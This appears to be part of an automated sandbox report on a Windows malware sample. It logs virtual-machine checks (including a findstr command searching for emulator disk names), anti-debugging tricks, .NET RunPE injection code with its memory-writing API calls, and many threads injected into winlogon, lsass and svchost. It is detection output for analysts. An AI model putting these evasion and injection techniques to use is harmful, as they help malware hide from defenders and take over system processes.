Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: cmd.exe, 00000013.00000003.1682676692.000001EBD5365000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1690176573.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1690012290.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_40-15439
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_40-15610

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 38_2_00007FFB4B1036CD rdtsc

38_2_00007FFB4B1036CD

Source: C:\Windows\System32\conhost.exe

Code function: 20_2_000001B4449084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

20_2_000001B4449084B0

Source: C:\Windows\System32\conhost.exe

Code function: 20_2_000001B444901E3C LoadLibraryA,GetProcAddress,SleepEx,

20_2_000001B444901E3C

Source: C:\Windows\System32\conhost.exe

Code function: 20_2_000001B444901000 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,

20_2_000001B444901000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B444908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000001B444908814
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B4449084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001B4449084B0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001B44490CD80
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_000001C0401C8814
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000001C0401C84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000001C0401CCD80
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401F8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	40_2_000001C0401F8814
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401F84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000001C0401F84B0
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_000001C0401FCD80
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E991758814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002E991758814
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002E99175CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E9917584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002E9917584B0
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E991788814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_000002E991788814
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002E99178CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E9917884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000002E9917884B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_00000158709D8814
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_00000158709D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_00000158709DCD80
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F0668814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_000002A3F0668814
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F06684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_000002A3F06684B0
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_000002A3F066CD80

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 38.2.powershell.exe.1a3a6b20000.15.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 38.2.powershell.exe.1a39e603b88.11.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 37.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 40_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

40_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 8500000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 91722EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: BDCB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 709A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 91722EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: BDCB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 709A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: B1632EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EFFC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AFB82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7C382EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 82772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: B1602EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EFFC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AFB82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1B1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7C382EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 82772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 1B1D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6AD72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3CD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73D32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 21B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3CA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73D32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 21B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BA662EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: B9FD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 54D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 55342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 57DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 57DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 33B72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 74532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C8542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 212A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 74532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C8542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 212A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 19362EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31802EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD9B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA1C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 19362EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31802EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA1C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D1A02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B0FC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E552EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D1A02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B0FC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FAC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E552EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1A932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 88F92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FAC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 857C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1A932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DEDC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 88F92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2112EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 857C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DEDC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FBEC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2112EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C622EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FBEC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C622EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F95A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9EEE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B2E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F95A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC6E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9EEE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B2E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC6E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2ED52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E6AF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 84C22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A0712EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E6AF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4DDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 84C22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F4C92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A0712EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A50F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4DDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ACF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F4C92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 85DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A50F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7CDE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ACF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 94182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 85DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 54372EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7CDE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 94182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 543A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 749D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9A22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 749D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9CB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: ADC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 85A52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 85A82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12925AC
